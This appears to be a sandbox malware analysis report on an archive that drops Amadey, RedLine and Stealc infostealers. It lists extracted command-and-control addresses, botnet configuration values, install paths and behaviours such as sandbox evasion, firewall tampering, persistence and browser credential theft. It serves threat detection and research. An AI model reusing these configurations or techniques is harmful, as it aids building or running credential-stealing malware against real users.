amadey | hxxps://tirrex[.]cl/server/arch0408_0224[.]7z

Resubmissions

14/04/2025, 17:31

250414-v3vf5swkw6 10

07/08/2024, 02:33

240807-c132dsscma 10

Analysis

max time kernel
377s
max time network
378s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07/08/2024, 02:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://tirrex.cl/server/arch0408_0224.7z

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

147.45.44.56:18168

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

http://185.215.113.16

Attributes

install_dir
44111dbc49
install_file
axplong.exe
strings_key
8d0ad6945b1a30a186ec2d30be6db0b5
url_paths
/Jo89Ku7d/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

0657d1

http://185.215.113.19

Attributes

install_dir
0d8f5eb8a7
install_file
explorti.exe
strings_key
6c55a5f34bb433fbd933a168577b1838
url_paths
/Vi9leo/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

20.52.165.210:39030

Extracted

Family

redline

185.215.113.67:21405

Extracted

Family

stealc

Botnet

default

http://185.215.113.17

http://185.215.113.24

Attributes

url_path
/2fb6c2cc8dce150a.php

Extracted

Family

redline

Botnet

BUY TG @FATHEROFCARDERS

45.66.231.214:9932

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Foot.pif
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Foot.pif

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/memory/2540-683-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/memory/4784-761-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral1/files/0x0007000000023566-867.dat	family_redline
behavioral1/memory/1228-879-0x00000000009B0000-0x0000000000A02000-memory.dmp	family_redline
behavioral1/files/0x0007000000023582-1005.dat	family_redline
behavioral1/memory/3740-1017-0x0000000000CF0000-0x0000000000D42000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

description	pid	Process	procid_target
PID 1408 created 3556	1408	Foot.pif	56
PID 4460 created 3556	4460	Foot.pif	56
PID 3136 created 3556	3136	Foot.pif	56
PID 1960 created 3556	1960	Foot.pif	56

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5cL0hbP2BlOOlA3K24bN_Kgl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	w74QkkuBF85hmDyo3WP13d2g.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JYqzDWcCifBR2B3OjSuXyEcL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
359	4932	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
424	powershell.exe
4204	powershell.exe
4932	powershell.exe
4132	powershell.EXE
552	powershell.exe
4932	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3820	netsh.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ugjsekhr\ImagePath = "C:\\Windows\\SysWOW64\\ugjsekhr\\htfkhnma.exe"	svchost.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5cL0hbP2BlOOlA3K24bN_Kgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JYqzDWcCifBR2B3OjSuXyEcL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	w74QkkuBF85hmDyo3WP13d2g.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	w74QkkuBF85hmDyo3WP13d2g.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	JYqzDWcCifBR2B3OjSuXyEcL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5cL0hbP2BlOOlA3K24bN_Kgl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	w74QkkuBF85hmDyo3WP13d2g.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	newalp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	explorti.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	691f3ea1e1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	D_IyF2JVTdF3h_AcBm4TwEC1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Foot.pif
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	5cL0hbP2BlOOlA3K24bN_Kgl.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Foot.pif
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	XBchmPW.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk	JYqzDWcCifBR2B3OjSuXyEcL.exe

Executes dropped EXE 47 IoCs

pid	Process
3876	setup.exe
1408	Foot.pif
220	Foot.pif
5060	setup.exe
4460	Foot.pif
2500	Foot.pif
3892	setup.exe
1384	setup.exe
1960	Foot.pif
3136	Foot.pif
3996	5cL0hbP2BlOOlA3K24bN_Kgl.exe
4960	3NcWoIwM1AbzK3IQPHPOLtww.exe
2060	shYdB1lAKdOjVl1A3sVBsMCM.exe
5096	D_IyF2JVTdF3h_AcBm4TwEC1.exe
3780	w74QkkuBF85hmDyo3WP13d2g.exe
4824	JYqzDWcCifBR2B3OjSuXyEcL.exe
4944	6WkPkBp_qxEUAf7fdQsFQqRE.exe
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
3184	Install.exe
4928	genyovocalremover32_64.exe
2156	genyovocalremover32_64.exe
4220	Install.exe
4656	axplong.exe
1808	explorti.exe
1928	GOLD.exe
3020	Foot.pif
2560	Foot.pif
3708	crypteda.exe
524	newalp.exe
3572	Hkbsse.exe
2096	9d0Y7MxBU5.exe
4540	LS6xXLfIqH.exe
1228	06082025.exe
2376	htfkhnma.exe
944	stealc_default.exe
2736	Hkbsse.exe
3604	axplong.exe
3592	explorti.exe
4664	Install.exe
3264	FILE2233.exe
3740	MYNEWRDX.exe
3100	XBchmPW.exe
4192	691f3ea1e1.exe
4332	752612fd8e.exe
6308	f9769c82fe.exe
6380	Hkbsse.exe
6336	axplong.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	5cL0hbP2BlOOlA3K24bN_Kgl.exe
Key opened	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Wine	w74QkkuBF85hmDyo3WP13d2g.exe

Indirect Command Execution 1 TTPs 17 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
1412	forfiles.exe
1712	forfiles.exe
2736	forfiles.exe
3420	forfiles.exe
1692	forfiles.exe
5096	forfiles.exe
392	forfiles.exe
4356	forfiles.exe
4232	forfiles.exe
2296	forfiles.exe
1416	forfiles.exe
3372	forfiles.exe
428	forfiles.exe
528	forfiles.exe
4356	forfiles.exe
4748	forfiles.exe
3464	forfiles.exe

Loads dropped DLL 4 IoCs

pid	Process
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
2640	shYdB1lAKdOjVl1A3sVBsMCM.tmp
4932	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0008000000023515-461.dat	themida
behavioral1/memory/4824-556-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-561-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-575-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-574-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-562-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-560-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-559-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida
behavioral1/memory/4824-862-0x0000000000230000-0x0000000000D0B000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV6 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV6\\ExtreamFanV6.exe"	JYqzDWcCifBR2B3OjSuXyEcL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\691f3ea1e1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000036001\\691f3ea1e1.exe"	explorti.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	JYqzDWcCifBR2B3OjSuXyEcL.exe

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	XBchmPW.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	XBchmPW.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
96	iplogger.org
137	raw.githubusercontent.com
140	raw.githubusercontent.com
95	iplogger.org

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
106	api.myip.com
108	api.myip.com
109	ipinfo.io
110	ipinfo.io
51	api.myip.com
52	api.myip.com
53	ipinfo.io
54	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/4192-2014-0x0000000000F60000-0x0000000001A36000-memory.dmp	autoit_exe

Drops file in System32 directory 41 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD	XBchmPW.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Foot.pif
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	XBchmPW.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA	XBchmPW.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552	XBchmPW.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Foot.pif
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Foot.pif
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA	XBchmPW.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552	XBchmPW.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Foot.pif
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Foot.pif
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Foot.pif
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Foot.pif
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C	XBchmPW.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	XBchmPW.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Foot.pif
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Enumerates processes with tasklist 1 TTPs 8 IoCs

discovery

Process Discovery

T1057

pid	Process
3104	tasklist.exe
1888	tasklist.exe
636	tasklist.exe
4088	tasklist.exe
3764	tasklist.exe
4184	tasklist.exe
1972	tasklist.exe
4920	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

pid	Process
4824	JYqzDWcCifBR2B3OjSuXyEcL.exe
3996	5cL0hbP2BlOOlA3K24bN_Kgl.exe
3780	w74QkkuBF85hmDyo3WP13d2g.exe
4656	axplong.exe
1808	explorti.exe
3604	axplong.exe
3592	explorti.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4192	691f3ea1e1.exe
4332	752612fd8e.exe
6336	axplong.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1408 set thread context of 220	1408	Foot.pif	132
PID 4460 set thread context of 2500	4460	Foot.pif	147
PID 4960 set thread context of 2540	4960	3NcWoIwM1AbzK3IQPHPOLtww.exe	181
PID 3136 set thread context of 3020	3136	Foot.pif	192
PID 1960 set thread context of 2560	1960	Foot.pif	194
PID 1928 set thread context of 4784	1928	GOLD.exe	211
PID 3708 set thread context of 1988	3708	crypteda.exe	228
PID 2376 set thread context of 2396	2376	htfkhnma.exe	251

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	XBchmPW.exe
File created	C:\Program Files (x86)\vvJTKlMtnceU2\ZZwyJxHrZPGmN.dll	XBchmPW.exe
File created	C:\Program Files (x86)\vvJTKlMtnceU2\gzdoibS.xml	XBchmPW.exe
File created	C:\Program Files (x86)\vwqndnnCqxGqfSABTfR\ftKgIfu.xml	XBchmPW.exe
File created	C:\Program Files (x86)\BmOBxsKaWluAC\PgtuKRH.xml	XBchmPW.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	XBchmPW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	XBchmPW.exe
File created	C:\Program Files (x86)\vwqndnnCqxGqfSABTfR\NUQnfXJ.dll	XBchmPW.exe
File created	C:\Program Files (x86)\DRQwZPGpU\oSBEHQL.xml	XBchmPW.exe
File created	C:\Program Files (x86)\BmOBxsKaWluAC\RFuRebA.dll	XBchmPW.exe
File created	C:\Program Files (x86)\bKUdTlwcmkUn\RJJdVpp.dll	XBchmPW.exe
File created	C:\Program Files (x86)\DRQwZPGpU\ZyxrPm.dll	XBchmPW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	XBchmPW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	XBchmPW.exe

Drops file in Windows directory 23 IoCs

description	ioc	Process
File opened for modification	C:\Windows\GraduateMpegs	setup.exe
File opened for modification	C:\Windows\BranchExtra	setup.exe
File opened for modification	C:\Windows\BranchExtra	setup.exe
File created	C:\Windows\Tasks\MyLpWniagHGphKWhH.job	schtasks.exe
File created	C:\Windows\Tasks\VaqCHCHYKjmSnwqMg.job	schtasks.exe
File opened for modification	C:\Windows\BranchExtra	setup.exe
File opened for modification	C:\Windows\InstitutesHabits	setup.exe
File opened for modification	C:\Windows\IowaArmenia	setup.exe
File opened for modification	C:\Windows\IowaArmenia	setup.exe
File opened for modification	C:\Windows\GraduateMpegs	setup.exe
File created	C:\Windows\Tasks\axplong.job	w74QkkuBF85hmDyo3WP13d2g.exe
File created	C:\Windows\Tasks\CMdNcilRtZJtVJk.job	schtasks.exe
File opened for modification	C:\Windows\IowaArmenia	setup.exe
File opened for modification	C:\Windows\BranchExtra	setup.exe
File opened for modification	C:\Windows\InstitutesHabits	setup.exe
File opened for modification	C:\Windows\IowaArmenia	setup.exe
File opened for modification	C:\Windows\InstitutesHabits	setup.exe
File created	C:\Windows\Tasks\explorti.job	5cL0hbP2BlOOlA3K24bN_Kgl.exe
File opened for modification	C:\Windows\GraduateMpegs	setup.exe
File opened for modification	C:\Windows\GraduateMpegs	setup.exe
File opened for modification	C:\Windows\InstitutesHabits	setup.exe
File created	C:\Windows\Tasks\bJkMQFwoGoPsGTRxOv.job	schtasks.exe
File created	C:\Windows\Tasks\Hkbsse.job	newalp.exe

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3080	sc.exe
4520	sc.exe
3348	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 5 IoCs

pid	pid_target	Process	procid_target
4972	5096	WerFault.exe	175
4132	2376	WerFault.exe	244
4972	4664	WerFault.exe	257
5280	4220	WerFault.exe	185
404	3100	WerFault.exe	350

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
